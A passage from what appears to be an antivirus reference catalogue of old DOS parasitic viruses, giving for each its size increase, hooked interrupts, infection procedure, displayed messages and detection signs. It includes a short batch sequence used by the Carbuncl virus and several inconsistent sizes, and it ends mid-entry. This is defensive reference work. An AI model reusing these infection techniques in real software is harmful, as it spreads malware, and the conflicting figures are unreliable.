  6009.                      (Does not infect EXE files.)
  6010. PC Vectors Hooked: None
  6011.  
  6012. Execution Procedure:
  6013. 1) Searches for a COM file in the current directory.
  6014. 2) Checks whether the file is infected. If yes, continues to
  6015.     search until an uninfected file is found.
  6016. 3) If an uninfected file is found, the virus will proceed to
  6017.     infect it.
  6018.  
  6019. Damage: None
  6020.  
  6021. Detection method:  Detectable if the lengths of files increase by
  6022. 608-623 Bytes.
  6023.  
  6024. Remarks:
  6025. 1) The part of infection of the virus was badly written.  Most
  6026.     of the infected files cannot be executed normally (also the
  6027.     virus is not able to infect and damage).
  6028. 2) Non memory resident.
  6029. 3) When infecting files, the virus does not hook INT 24h.  Error
  6030.     message will appear when I/O errors occur.
  6031.  
  6032. [ARCV-2]
  6033. Virus Name: Arcv-2
  6034. Virus Type: Parasitic Virus
  6035. Virus Length: Infected EXE file sizes increase by 693 Bytes
  6036.                      (Does not infect COM files).
  6037. PC Vectors Hooked: INT 24h
  6038.  
  6039. Execution Procedure:
  6040. 1) Searches for an EXE file in the current directory.
  6041. 2) Checks whether the file is infected.  If yes, the virus
  6042.     continues to search.
  6043. 3) If an uninfected file is found, the virus will proceed to
  6044.     infect it (only infects one file at a time).
  6045. 4) Whether an uninfected EXE file is found or not,
  6046.     the virus will check the system date.  When the date is
  6047.     "April" or "the sixth of the month", the virus will display
  6048.  
  6049.     "Help  ..  Help  ..  I'm Sinking ........"
  6050.  
  6051.     on the screen.
  6052.  
  6053. Damage: None
  6054.  
  6055. Detection method:  Detectable if the lengths of files increase by
  6056. 693 Bytes.
  6057.  
  6058. Remarks:
  6059. 1) The part of infection was badly written.  Most of the
  6060.     infected files cannot be executed normally (also the virus is
  6061.     not able to infect and damage).
  6062. 2) Non memory resident.
  6063. 3) When infecting files, the virus does not hook INT 24h.  Error
  6064.     message will appear when I/O errors occur.
  6065.  
  6066. [Hallo-759]
  6067. Virus Name: Hallo-759
  6068. Virus Type: Parasitic Virus
  6069. Virus Length: Infected COM file sizes increase by 533 bytes
  6070.                      (Does not infect EXE files).
  6071. PC Vectors Hooked: None
  6072.  
  6073. Execution Procedure:
  6074. 1) Searches for a COM file in the current directory.
  6075. 2) Checks whether the file is infected. If yes, continues to
  6076.     search until an uninfected file is found and then infects it.
  6077.     (only infects one file at a time).  After infecting, the virus
  6078.     displays the string:
  6079.  
  6080.     "I have got a virus for you!".
  6081.  
  6082. Damage: None
  6083.  
  6084. Detection method: Detectable when the string "I have got a virus for
  6085. you!" is displayed when executing programs and if the lengths of
  6086. files increases by 759-775 Bytes.
  6087.  
  6088. Remarks:
  6089. 1) The infection part was badly written.  After the infected
  6090.     files end, the system will hang.
  6091. 2) Non memory resident.
  6092. 3) When infecting files, the virus does not hook INT 24h.  Error
  6093.     message will appear when I/O errors occur.
  6094.  
  6095. [Atomic-2A]
  6096. Virus Name: Atomic-2a
  6097. Virus Type: Parasitic Virus
  6098. Virus Length: Infected COM file sizes increase by 350 Bytes
  6099.                      (Does not infect EXE files).
  6100. PC Vectors Hooked: None
  6101.  
  6102. Execution Procedure:
  6103. 1) Searches for a COM file in the current directory.
  6104. 2) Checks whether the file is infected.  If yes, continues to
  6105.     search until an uninfected file is found and then infects it.
  6106.     (only infects one file at a time.)
  6107.  
  6108. Damage: None
  6109.  
  6110. Detection method:  Detectable if the lengths of files increase by
  6111. 350 Bytes.
  6112.  
  6113. Remarks:
  6114. 1) Non memory resident.
  6115. 2) When infecting files, the virus does not hook INT 24h. Error
  6116.     message will appear when I/O errors occur.
  6117.  
  6118. [Atomic-1B]
  6119. Virus Name: Atomic-1b
  6120. Virus Type: Parasitic Virus
  6121. Virus Length:  The lengths of the infected COM files do not
  6122.                       increase (Does not infect EXE files.)
  6123. PC Vectors Hooked: None
  6124.  
  6125. Execution Procedure:
  6126. 1) When the system date is the 1st, the virus will display
  6127.  
  6128.     "The Atomic Dustbin--YOUR PHUCKED!"
  6129.  
  6130.     The system then hangs.
  6131.  
  6132. 2) When the system date is the 26th, the following message will
  6133.     be displayed before the system hangs:
  6134.  
  6135.     "The Atomic Dustbin 1B -- This is almost the second step !"
  6136.  
  6137. 3) When the system date is neither the 1st nor the 26th:
  6138.      i) the virus proceeds to search all COM files in the current
  6139.          directory;
  6140.     ii) checks whether the file is infected. If yes, continues to
  6141.          search;
  6142.    iii) if an uninfected file is found, proceeds to infect it.
  6143.          (only infects two files at a time).  After infecting,
  6144.          displays "Program execution terminated."
  6145.  
  6146. Damage: None
  6147.  
  6148. Detection method: Detectable if the string "Program execution
  6149. terminated" is displayed when a program is executed.
  6150.  
  6151. Remarks:
  6152. 1) Non memory resident.
  6153. 2) When infecting files, the virus does not hook INT 24h. Error
  6154.     message will appear when I/O errors occur.
  6155.  
  6156. [Atomic-1A]
  6157. Virus Name: Atomic-1A
  6158. Virus Type: Parasitic Virus
  6159. Virus Length:  The lengths of the infected COM files do not
  6160.                       increase (Does not infect EXE files.)
  6161. PC Vectors Hooked: None
  6162.  
  6163. Execution Procedure:
  6164. 1) When the system date is the 25th, the virus displays the
  6165.     string "The Atomic Dustbin 1A -- This is almost the first step
  6166.     !" and hangs the system.
  6167. 2) When the system date is not the 25th:
  6168.      i) it searches for a COM file in the current directory;
  6169.     ii) checks whether the file is infected. If yes, continues to
  6170.          search;
  6171.    iii) if an uninfected file is found, the virus will proceed to
  6172.          infect it (only infects two files at a time).  After
  6173.          infecting, displays the string "Bad command or file name".
  6174.  
  6175. Damage: None
  6176.  
  6177. Detection method: Detectable if the string "bad command or file name"
  6178. is displayed when a file is executed.
  6179.  
  6180. Remarks:
  6181. 1) Non memory resident.
  6182. 2) When infecting files, the virus does not hook INT 24h. Error
  6183.     message will appear when I/O errors occur.
  6184.  
  6185. [Arusiek]
  6186. Virus Name: Arusiek
  6187. Virus Type: Parasitic Virus
  6188. Virus Length: Infected EXE and COM file sizes increase by 817
  6189.                      bytes.
  6190. PC Vectors Hooked:  INT 21h and INT 24h
  6191.  
  6192. Execution Procedure:
  6193. 1) Checks whether it already resides in the memory.  If not, it
  6194.     hooks INT 21h and implants itself in memory, and then executes
  6195.     the host program.
  6196. 2) If it already resides in memory, the host program will be
  6197.     executed directly.
  6198.  
  6199. Infection Procedure:
  6200. 1) Infects files by AH=4B in INT 21h. Uninfected files will be
  6201.     infected when they are executed.
  6202. 2) Before infecting files, the virus will hook INT 24h in order
  6203.     to ignore I/O errors.
  6204.  
  6205. Damage:  None
  6206.  
  6207. Detection method:  Detectable if the lengths of files increase
  6208. by 817 bytes.
  6209.  
  6210. [Atas-3]
  6211. Virus Name: Atas-3
  6212. Virus Type: Parasitic Virus
  6213. Virus Length: Infected EXE and COM file sizes increase by 1268
  6214.                      bytes.
  6215. PC Vectors Hooked:  INT 21h and INT 24h
  6216.  
  6217. Execution Procedure:
  6218. 1) Checks whether it resides in the memory.  If not, hooks INT
  6219.     21h and implants itself in the memory, and then executes the
  6220.     host program.
  6221. 2) If it already resides in the memory, the host program will be
  6222.     executed directly.
  6223.  
  6224. Infection Procedure:
  6225. 1) Infects files by AH=4B in INT 21h.  Uninfected files will be
  6226.     infected when they are executed.
  6227. 2) Before infecting files, the virus will hook INT 24h in order
  6228.     to ignore I/O errors.
  6229.  
  6230. Damage:  None
  6231.  
  6232. Detection method:  Detectable if the lengths of files increase
  6233. by 1268 bytes.
  6234.  
  6235. [ARCV-570]
  6236. Virus Name: Arcv-570
  6237. Virus Type: Parasitic Virus
  6238. Virus Length:  Infected EXE file sizes increase by 570-585 Bytes
  6239.                       (Does not infect COM files.)
  6240. PC Vectors Hooked: None
  6241.  
  6242. Execution Procedure:
  6243. 1) Searches for an EXE file in the current directory.
  6244. 2) Checks whether the file is infected. If yes, continues to
  6245.     search until an uninfected file is found and then infects it
  6246.     (only infects one file at a time).
  6247.  
  6248. Damage: None
  6249.  
  6250. Detection method: Detectable if the lengths of files increase by
  6251. 570-585 Bytes.
  6252.  
  6253. Remarks:
  6254. 1) Non memory resident.
  6255. 2) When infecting files, it does not hook INT 24h. Error message
  6256.     will appear when I/O errors occur.
  6257.  
  6258. [Atas-3215]
  6259. Virus Name: Atas-3215
  6260. Virus Type: Parasitic Virus.
  6261. Virus Length: About 3215 bytes (there are several variations.)
  6262. PC Vectors Hooked:  INT 21h
  6263.  
  6264. Execution Procedure: (The virus only infects files in DOS 3.3)
  6265. 1) Checks whether it resides in the memory.  If not, hooks INT
  6266.     21h and implants itself in the memory, and proceeds to execute
  6267.     the original program.
  6268. 2) If it already resides in the memory, the host program will be
  6269.     executed directly.
  6270.  
  6271. Infection Procedure:
  6272. 1) Infects files by AH=4B in INT 21h.  Uninfected files will be
  6273.     infected when they are executed.
  6274.  
  6275. [Andromda]
  6276. Virus Name: Andromda
  6277. Virus Type: Parasitic Virus
  6278. Virus Length:  Infected COM files increase by 1140 Bytes
  6279.                       (Does not infect EXE files).
  6280. PC Vectors Hooked: None
  6281.  
  6282. Execution Procedure:
  6283. 1) Searches for a COM file in the current directory.
  6284. 2) Checks whether the file is infected.  If yes, continues to
  6285.     search until an uninfected file is found.
  6286. 3) Then infects it (only infects two files at a time.)
  6287.  
  6288. Damage: None
  6289.  
  6290. Detection method:  Detectable if the lengths of files increase by
  6291. 1140 Bytes.
  6292.  
  6293. Remarks:
  6294. 1) Non memory resident.
  6295. 2) When infecting files, the virus does not hook INT 24h. Error
  6296.     message will appear when I/O errors occur.
  6297.  
  6298. [Grunt-529]
  6299. Virus Name: Grunt-529
  6300. Virus Type: Parasitic Virus
  6301. Virus Length:  Infected COM files increase by 529 Bytes
  6302.                       (Does not infect EXE files).
  6303. PC Vectors Hooked: None
  6304.  
  6305. Execution Procedure:
  6306. 1) Searches for a COM file in the current directory.
  6307. 2) Checks whether the file is infected.  If yes, continues to
  6308.     search.
  6309. 3) If an uninfected file is found, infects it. (only infects one
  6310.     file at a time.)
  6311. 4) Checks the system date no matter an uninfected COM
  6312.     file is found or not.  If the date is Friday and it is after the
  6313.     year 1993, the virus displays the following information on
  6314.     the screen:
  6315.  
  6316.     "Nothing like the smell of napalm in the morning!"
  6317.  
  6318. Damage: None
  6319.  
  6320. Detection method:  Detectable if the lengths of files increase by
  6321. 529 Bytes.
  6322.  
  6323. Remarks:
  6324. 1) Non memory resident.
  6325. 2) When infecting files, the virus does not hook INT 24h.  Error
  6326.     message will appear when I/O errors occur.
  6327.  
  6328. [Ein-Volk]
  6329. Virus Name: Ein-Volk
  6330. Virus Type: Parasitic Virus
  6331. Virus Length:  Infected COM files increase by 482 Bytes
  6332.                       (Does not infect EXE files.)
  6333. PC Vectors Hooked: None
  6334.  
  6335. Execution Procedure:
  6336. 1) Searches for a COM file in the current directory.
  6337. 2) Checks whether the file is infected.  If yes, continues to
  6338.     search.
  6339. 3) If an uninfected file is found, proceeds to infect it. Does
  6340.     not stop searching until all the COM files in the directory are
  6341.     infected.
  6342.  
  6343. Damage: None
  6344.  
  6345. Detection method:  Detectable if the lengths of files increase by
  6346. 482 Bytes.
  6347.  
  6348. Remarks:
  6349. 1) Non memory resident.
  6350. 2) When infecting files, the virus does not hook INT 24h. Error
  6351.     message will appear when I/O errors occur.
  6352.  
  6353. [DOS7]
  6354. Virus Name: Dos7
  6355. Virus Type: Parasitic Virus
  6356. Virus Length:  Infected COM files increase by 342 Bytes
  6357.                       (Does not infect EXE files).
  6358. PC Vectors Hooked: None
  6359.  
  6360. Execution Procedure:
  6361. 1) Searches for a COM file in the current directory.
  6362. 2) Checks whether the file is infected. If yes, it continues to
  6363.     search.
  6364. 3) If an uninfected file is found, the virus proceeds to infect
  6365.     it (only infects one file at a time).
  6366.  
  6367. Damage: None
  6368.  
  6369. Detection method:  Detectable if the lengths of files increase by
  6370. 342 Bytes.
  6371.  
  6372. Remarks:
  6373. 1) Non memory resident.
  6374. 2) When infecting files, the virus does not hook INT 24h. Error
  6375.     message will appear when I/O errors occur.
  6376.  
  6377. [Dooms-715]
  6378. Virus Name: Dooms-715
  6379. Virus Type: Parasitic Virus
  6380. Virus Length:  Infected COM files increase by 715 Bytes
  6381.                       (Does not infect EXE files).
  6382. PC Vectors Hooked: None
  6383.  
  6384. Execution Procedure:
  6385. 1) Searches for a COM file in the root directory.
  6386. 2) Checks whether the file is infected. If yes, continues to
  6387.     search.
  6388. 3) If an uninfected file is found, infects it (only infects one
  6389.     file at a time).
  6390.  
  6391. Damage: None
  6392.  
  6393. Detection method:  Detectable if the lengths of files increase by
  6394. 715 Bytes.
  6395.  
  6396. Remarks:
  6397. 1) Non memory resident.
  6398. 2) When infecting files, the virus does not hook INT 24h. Error
  6399.     message will appear when I/O errors occur.
  6400.  
  6401. [Dir-522]
  6402. Virus Name: Dir-522
  6403. Virus Type: Parasitic Virus
  6404. Virus Length: Infected COM files increase by 1268 bytes
  6405.                      (Does not infect EXE files).
  6406. PC Vectors Hooked:  INT 21h and INT 24h
  6407.  
  6408. Execution Procedure:
  6409. 1) Checks whether it resides in memory.  If not, hooks INT 21h
  6410.     and implants itself in memory, and then executes the host
  6411.     program.
  6412. 2) If it already resides in memory, the host program will be
  6413.     executed directly.
  6414.  
  6415. Infection Procedure:
  6416. 1) The virus infects files by "dir" command. When "dir" command
  6417.     is executed, the virus searches for an uninfected file and
  6418.     then infects it.
  6419. 2) Before infecting files, the virus hooks INT 24h in order to
  6420.     ignore I/O errors.
  6421.  
  6422. Damage:  None
  6423.  
  6424. Detection method:  Detectable if the lengths of files increase
  6425. by 522 bytes.
  6426.  
  6427. [Compan-83]
  6428. Virus Name: Compan-83
  6429. Virus Type: Parasitic Virus
  6430. Virus Length:  83 bytes
  6431. PC Vectors Hooked:  INT 21h
  6432.  
  6433. Execution Procedure:
  6434. 1) Checks whether it resides in memory. If not, hooks INT 21h and
  6435.     implants itself in memory, and then executes the host program.
  6436. 2) If it already resides in memory, the program will be executed
  6437.     directly.
  6438.  
  6439. Infection Procedure:
  6440. 1) The virus infects files by AH=4B in INT 21h. When an infected
  6441.     EXE file is executed, the virus will create a COM file with a
  6442.     length of 83 bytes. The content of the COM file is the virus
  6443.     itself (hidden file).
  6444. 2) When infecting files, the virus does not hook INT 24h. Error
  6445.     message will appear when I/O errors occur.
  6446.  
  6447. Damage:  None
  6448.  
  6449. Detection method:  Detectable if the file increases by 83 bytes.
  6450.  
  6451. [ChipShit]
  6452. Virus Name: Chipshit
  6453. Virus Type: Parasitic Virus
  6454. Virus Length:  Infected COM files increase by 877 bytes
  6455.                       (Does not infect EXE files).
  6456. PC Vectors Hooked:  None
  6457.  
  6458. Execution Procedure:
  6459. 1) Checks the system date. If the date is later than Feb.
  6460.     11, 1993, the virus displays the following information on the
  6461.     screen:
  6462.  
  6463.      "Hej! Tu wirus chipshit! Co........"
  6464.  
  6465. 2) If the date is before Feb. 11, 1993:
  6466.     a) Searches for a COM file in the current directory.
  6467.     b) Checks whether the file is infected. If yes, it continues to
  6468.         search.
  6469.     c) If an uninfected file is found, it proceeds to infect it
  6470.         (only infects one file at a time).
  6471.  
  6472. Damage:  None
  6473.  
  6474. Detection method:  Detectable if the lengths of files increase by
  6475. 877 bytes.
  6476.  
  6477. Remarks:
  6478. 1) Non memory resident.
  6479. 2) When infecting files, the virus does not hook INT 24h. Error
  6480.     message will appear when I/O errors occur.
  6481.  
  6482. [Carbuncl]
  6483. Virus Name: Carbuncl
  6484. Virus Type: Parasitic Virus
  6485. Virus Length:  622 bytes
  6486. PC Vectors Hooked:  None
  6487.  
  6488. Execution Procedure:
  6489. 1) With a 5/6 chance probability:
  6490.     i) Searches for an EXE file in the current directory.
  6491.    ii) Renames the file as *.crp, and then creates a  *.bat
  6492.         file with the following commands:
  6493.  
  6494.                    @ECHO OFF
  6495.                    CARBUNCL
  6496.                    RENAME JEXE.CRP JEXE.EXE
  6497.                    JEXE.EXE
  6498.                    RENAME JEXE.EXE JEXE.CRP
  6499.                    CARBBUNCL
  6500.  
  6501.        (JEXE.EXE is the infected file, and CARBUNCL is the virus)
  6502.   iii) Repeats the above procedure until all EXE files are
  6503.         infected.
  6504. 2) With a 1/6 chance probability:  Infects five *.CRP files.
  6505.  
  6506. Damage:  None
  6507.  
  6508. Detection method: Detectable if the lengths of files increase
  6509. by 877 bytes.
  6510.  
  6511. Remarks:
  6512. 1) Non memory resident.
  6513. 2) When infecting files, the virus does not hook INT 24h. Error
  6514.     message will appear when I/O errors occur.
  6515.  
  6516. [VCL-2]
  6517. Virus Name: Vcl-2
  6518. Virus Type: Parasitic Virus
  6519. Virus Length:  Infected COM files increase by 663 bytes
  6520.                       (Does not infect EXE files).
  6521. PC Vectors Hooked:  None
  6522.  
  6523. Execution Procedure:
  6524. 1) Searches for a COM file in the current directory.
  6525. 2) Checks if the file is infected. If yes, continues to search.
  6526. 3) If an uninfected file is found, it proceeds to infect it
  6527.     (only infects two files at a time).
  6528.  
  6529. Damage:  None
  6530.  
  6531. Detection method: Infected files increase by 663 bytes
  6532.  
  6533. Remarks:
  6534. 1) Non memory resident.
  6535. 2) When infecting files, the virus does not hook INT 24h. Error
  6536.     message will appear when I/O errors occur.
  6537.  
  6538. [Necro]
  6539. Virus Name: Necro
  6540. Virus Type: Parasitic Virus
  6541. Virus Length:  Infected COM and EXE files increase by 696 bytes.
  6542. PC Vectors Hooked:  None
  6543.  
  6544. Execution Procedure:
  6545. 1) Searches for an uninfected COM/EXE file.
  6546. 2) Checks if the file has been infected. If yes, continues to
  6547.     search.
  6548. 3) If an uninfected file is found, infects it (infects three
  6549.     files at a time).
  6550.  
  6551. Damage:  None
  6552.  
  6553. Detection method:  Detectable if the files increase by 696 bytes
  6554.  
  6555. Remarks:
  6556. 1) The infection part was badly written, so most of the infected
  6557.     files can not execute (not able to infect and damage).
  6558. 2) Non memory  resident.
  6559. 3) Before infecting files, the virus does not hook INT 24h.
  6560.     Error message will appear when I/O errors occur.
  6561.  
  6562. [Eagl-7705]
  6563. Virus Name: Eagl-7705
  6564. Virus Type: Parasitic Virus
  6565. Virus Length:  7705 bytes
  6566.  
  6567. Execution Procedure:
  6568. 1) Searches for an EXE file in the  current directory.
  6569. 2) Then creates a COM file with a length of 7705 bytes. The
  6570.     contents of the COM file is the virus itself (hidden file).
  6571. 3) Repeats the procedure until all EXE files in the current
  6572.     directory are infected.
  6573.  
  6574. Damage:  None
  6575.  
  6576. Detection method:  Detectable if the lengths of files increase
  6577. by 7705 bytes.
  6578.  
  6579. Remarks:  Non memory resident.
  6580.  
  6581. [Eno-2430]
  6582. Virus Name: Eno-2430
  6583. Virus Type: Parasitic Virus
  6584. Virus Length:  Infected COM and EXE files increase by 2430-2445 bytes.
  6585. PC Vectors Hooked:  INT 21h and INT 24h
  6586.  
  6587. Execution Procedure:
  6588. 1) Checks if it resides in memory. If not, hooks INT 21h,
  6589.     installs itself as memory resident and then executes the host
  6590.     program.
  6591. 2) If it already resides in memory, executes the host program
  6592.     directly.
  6593.  
  6594. Infection Procedure:
  6595. 1) The virus infects files by AH=4B in INT 21h. When an
  6596.     uninfected program is executed, it becomes infected.
  6597. 2) Before infecting files, Eno-2430 will hook INT 24h first to
  6598.     ignore I/O errors.
  6599.  
  6600. Damage:  The virus has a counter; after infecting a file, it
  6601. subtracts 1 from the counter. When the counter=0, the virus
  6602. will destroy all data on the hard disk.
  6603.  
  6604. Detection method:  Detectable if the files increase by 2430-2445
  6605. bytes.
  6606.  
  6607. [Exper-755]
  6608. Virus Name: Exper-755
  6609. Virus Type: Parasitic Virus
  6610. Virus Length:  Infected EXE files increase by 755 bytes
  6611.                       (Does not infect COM files).
  6612. PC Vectors Hooked:  INT 24h
  6613.  
  6614. Execution Procedure:
  6615. 1) Searches for an EXE file in the current directory.
  6616. 2) Checks if the file is infected. If yes, continues to search.
  6617. 3) If an uninfected file is found, proceeds to infect it. Does
  6618.     not stop searching until all the COM files in the directory
  6619.     are infected.
  6620.  
  6621. Damage:  None
  6622.  
  6623. Detection method:  Detectable if the files increase by 755 bytes.
  6624.  
  6625. Remarks:
  6626. 1) Non memory resident.
  6627. 2) Before infecting, the virus hooks INT 24h first to ignore I/O
  6628.     errors.
  6629.  
  6630. [Findm-695]
  6631. Virus Name: Findm-695
  6632. Virus Type: Parasitic Virus
  6633. Virus Length:  Infected COM files increase by 695-710 bytes
  6634.                       (Does not infect EXE files).
  6635. PC Vectors Hooked:  None
  6636.  
  6637. Execution Procedure:
  6638. 1) Searches for a COM file in the current directory.
  6639. 2) Checks if the file is infected. If yes, continues to search.
  6640. 3) If an uninfected file is found, proceeds to infect it.
  6641.  
  6642. Damage: None
  6643.  
  6644. Detection method: Detectable if the files increase by 695-710
  6645. bytes.
  6646.  
  6647. Remarks:
  6648. 1) The infection part of the virus was badly written.  Most of
  6649.     the infected files can not be executed normally (The virus is
  6650.     not able to infect and damage).
  6651. 2) Non memory resident.
  6652. 3) When infecting files, the virus does not hook INT 24h. Error
  6653.     message will appear when I/O errors occur.
  6654.  
  6655. [FR-1013]
  6656. Virus Name: FR-1013
  6657. Virus Type: Parasitic Virus
  6658. Virus Length: Infected EXE and COM files increase by 1013-1028 bytes.
  6659. PC Vectors Hooked:  INT 21h
  6660.  
  6661. Execution Procedure:
  6662. 1) Checks if it resides in the memory. If not, hooks INT 21h,
  6663.     installs itself as memory resident and  then executes the
  6664.     host program.
  6665. 2) If it already resides in the memory, proceeds to execute the
  6666.     host program directly.
  6667.  
  6668. Infection Procedure:
  6669. 1) The virus infects files by AH=4B in INT 21h. When an
  6670.     uninfected program is executed, it becomes infected.
  6671. 2) When infecting files, the virus does not hook INT 24h. Error
  6672.     message will appear when I/O errors occur.
  6673.  
  6674. Damage:  None
  6675.  
  6676. Detection method:  Detectable if the files increase by 1013-1028
  6677. bytes.
  6678.  
  6679. [Harm-1082]
  6680. Virus Name: Harm-1082
  6681. Virus Type: Parasitic Virus
  6682. Virus Length: Infected COM files increase by 1082-1097
  6683.                      bytes (Does not infect EXE files).
  6684. PC Vectors Hooked:  INT 21h
  6685.  
  6686. Execution Procedure:
  6687. 1) Checks if it resides in the memory. If not, it hooks INT 21h,
  6688.     installs itself as memory resident and then executes the host
  6689.     program.
  6690. 2) If it already resides in the memory, it proceeds to execute the
  6691.     host program directly.
  6692.  
  6693. Infection Procedure: The virus infects files by AH=4B in INT 21h.
  6694. When an uninfected program is executed, it becomes infected.
  6695.  
  6696. Damage:  None
  6697.  
  6698. Detection method:  Detectable if the files increase by 1082-1097
  6699. bytes.
  6700.  
  6701.  
  6702.  
  6703.  
  6704.  
  6705.  
  6706.  
  6707.  
  6708.  
  6709.  
  6710.  
  6711.  
  6712.  
  6713.  
  6714.  
  6715.  
  6716.  
  6717.  
  6718.  
  6719.  
  6720.  
  6721.  
  6722. [Hor-2248]
  6723. Virus Name: Hor-2248
  6724. Virus Type: Parasitic Virus
  6725. Virus Length:  Infected EXE and COM files increase by 2248
  6726.                bytes.
  6727.  
  6728. PC Vectors Hooked:  INT 21h and INT 24h
  6729.  
  6730. Execution Procedure: (The virus cannot run in DOS 5.0)
  6731. 1) Checks if it resides in the memory. If not, it hooks INT 21h,
  6732.     installs itself as memory resident and then executes the host
  6733.     program.
  6734. 2) If it already resides in the memory, it proceeds to execute the host
  6735.    program directly.
  6736.  
  6737. Infection Procedure:
  6738. 1) The virus infects files by AH=4B in INT 21h. When an
  6739.    uninfected program is executed, it becomes infected.
  6740. 2) Before infecting, the virus hooks INT 24h first to ignore I/O
  6741.    errors.
  6742.  
  6743. Damage: None
  6744.  
  6745. Detection method: Detectable if the files increase by 2248
  6746. bytes.
  6747.  
  6748. [Encroach2]
  6749. Virus Name: Encroach2
  6750. Virus Type: Parasitic Virus
  6751.  
  6752. PC Vectors Hooked:  INT 24h
  6753.  
  6754. Execution Procedure:
  6755. 1) Searches for a COM file in the current directory.
  6756. 2) Checks if the file is infected. If yes, it continues to search.
  6757. 3) If an uninfected file is found, proceeds to infect it (infects
  6758.    one file at a time).
  6759.  
  6760. Damage:  None
  6761.  
  6762. Remarks:
  6763. 1) Non memory resident.
  6764. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
  6765.  
  6766. [Encroach]
  6767. Virus Name: Encroach
  6768. Virus Type: Parasitic Virus
  6769.  
  6770. PC Vectors Hooked:  INT 24h
  6771.  
  6772. Execution Procedure:
  6773. 1) Searches for a COM file in the current directory.
  6774. 2) Checks if the file is infected. If yes, it continues to search.
  6775. 3) If an uninfected file is found, proceeds to infect it (infects
  6776.    one file at a time).
  6777.  
  6778. Damage:  None
  6779.  
  6780. Remarks:
  6781. 1) Non memory resident.
  6782. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
  6783.  
  6784. [DWI]
  6785. Virus Name: Dwi
  6786. Virus Type: Parasitic Virus
  6787. Virus Length:  Infected EXE files increase by 1050-1070
  6788.                bytes (Does not infect COM files).
  6789.  
  6790. PC Vectors Hooked:  INT 21h and INT 24h
  6791.  
  6792. Execution Procedure:
  6793. 1) Checks if it resides in the memory.  If not, it hooks INT 21h,
  6794.    installs itself as memory resident and proceeds to execute the
  6795.    host program.
  6796. 2) If it already resides in the memory, it proceeds to execute the host
  6797.    program directly.
  6798.  
  6799. Infection Procedure:
  6800. 1) The virus infects files by AH=4B in INT 21h. When an
  6801.    uninfected program is executed, it becomes infected.
  6802. 2) Before infecting, the virus hooks INT 24h to ignore I/O errors.
  6803.  
  6804. Damage: None
  6805.  
  6806. Detection method: Detectable if the files increase by 1050-1070
  6807. bytes.
  6808.  
  6809. [Dennis]
  6810. Virus Name: Dennis (has at least two variations)
  6811. Virus Type: Parasitic Virus
  6812. PC Vectors Hooked:  INT 21h
  6813.  
  6814. Execution Procedure:
  6815. 1) Checks if it resides in the memory.  If not, it hooks INT 21h,
  6816.    installs itself as memory resident and then executes the
  6817.    host program.
  6818. 2) If it already resides in the memory, it proceeds to execute the
  6819.    host program directly.
  6820.  
  6821. Infection Procedure:
  6822. 1) The virus infects files by AH=4B in INT 21h. When an
  6823.    uninfected program is executed, it becomes infected.
  6824. 2) When infecting files, Dennis does not hook INT 24h. Error
  6825.    message will appear when I/O errors occur.
  6826.  
  6827. Damage:  None
  6828.  
  6829. [Comsysexe]
  6830. Virus Name: Comsysexe (There are several variations)
  6831. Virus Type: Parasitic Virus
  6832.  
  6833. PC Vectors Hooked:  INT 21h
  6834.  
  6835. Execution Procedure:
  6836. 1) Checks if it resides in the memory.  If not, it hooks
  6837.    INT 21h, installs itself as memory resident and
  6838.    then executes the host program.
  6839. 2) If it already resides in the memory, it proceeds to
  6840.    execute the host program directly.
  6841.  
  6842. Infection Procedure:
  6843. 1) The virus infects files by AH=4B in INT 21h.
  6844.    When an uninfected program is executed, it
  6845.    becomes infected. (infects EXE, COM and SYS
  6846.    files)
  6847. 2) When infecting files, Comsysexe does not hook
  6848.    INT 24h.  Error message will appear when I/O
  6849.    errors occur.
  6850.  
  6851. Damage:  None
  6852.  
  6853. [Cruncher]
  6854. Virus Name: Cruncher
  6855. Virus Type: Parasitic Virus
  6856.  
  6857. PC Vectors Hooked:  INT 21h and INT 24h
  6858.  
  6859. Execution Procedure:
  6860. 1) Check if it resides in memory.  If not, it hooks INT 21h,
  6861.    installs itself as memory resident and then executes the host
  6862.    program.
  6863. 2) If it already resides in memory, it proceeds to execute the host
  6864.    program directly.
  6865.  
  6866. Infection Procedure:
  6867. 1) The virus infects files by AH=4B in INT 21h. When an
  6868.    uninfected program is executed, it becomes infected.
  6869. 2) Before infecting files, the virus hooks INT 24h to ignore I/O
  6870.    errors.
  6871.  
  6872. Damage:  None
  6873.  
  6874. [Ice-159]
  6875. Virus Name: Ice-159
  6876. Virus Type: Parasitic Virus
  6877. Virus Length:  Infected COM files increase by 159 bytes
  6878.                (Does not infect EXE files).
  6879.  
  6880. PC Vectors Hooked:  None
  6881.  
  6882. Execution Procedure:
  6883. 1) Searches for a COM file in the current directory.
  6884. 2) Checks if the file is infected. If yes, it continues to search.
  6885. 3) If an uninfected file is found, it proceeds to infect it (infects
  6886.    one file at a time).
  6887.  
  6888. Damage:  None
  6889.  
  6890. Detection method:  Detectable if the files increase by 159 bytes.
  6891.  
  6892. Remarks:
  6893. 1) Non memory resident.
  6894. 2) When infecting files, the virus does not hook INT 24h.  Error
  6895.    messages will appear when I/O errors occur.
  6896.  
  6897. [Joker3]
  6898. Virus Name: Joker3
  6899. Virus Type: Parasitic Virus
  6900. Virus Length:  Infected COM files increase by 1084 bytes
  6901.                (Does not infect EXE files).
  6902.  
  6903. PC Vectors Hooked:  INT 21h
  6904.  
  6905. Execution Procedure:
  6906. 1) Checks if it resides in the memory.  If not, it hooks INT 21h,
  6907.    installs itself as memory resident and then executes the host
  6908.    program.
  6909. 2) If it already resides in the memory, it proceeds to execute the
  6910.    host program directly.
  6911.  
  6912. Infection Procedure: The virus infects files by INT 21h.  When
  6913. INT 21h is executed, all the COM files in the current directory
  6914. will be infected.  When infecting files, the virus does not hook
  6915. INT 24h.  Error message will appear when I/O errors occur.
  6916.  
  6917. Damage:  None
  6918.  
  6919. Detection method:  Detectable if the files increase by 1084
  6920. bytes.
  6921.  
  6922. [Mi-Nazi]
  6923. Virus Name: Mi-Nazi
  6924. Virus Type: Parasitic Virus
  6925. Virus Length:  Infected COM files increase by 1084 bytes
  6926.                (Does not infect EXE files).
  6927.  
  6928. PC Vectors Hooked:  INT 21h
  6929.  
  6930. Execution Procedure:
  6931. 1) Searches for a COM file in the current directory.
  6932. 2) Checks if the file is infected. If yes, it continues to search.
  6933. 3) If an uninfected file is found, it proceeds to infect it
  6934.    (only infects one file at a time).
  6935.  
  6936. Damage: The part for virus infection was badly written. The
  6937. infected files cannot be executed normally (Furthermore, the
  6938. virus is not able to infect and damage).
  6939.  
  6940. Remarks:
  6941. 1) The virus infects files by INT 21h. When INT 21h is executed,
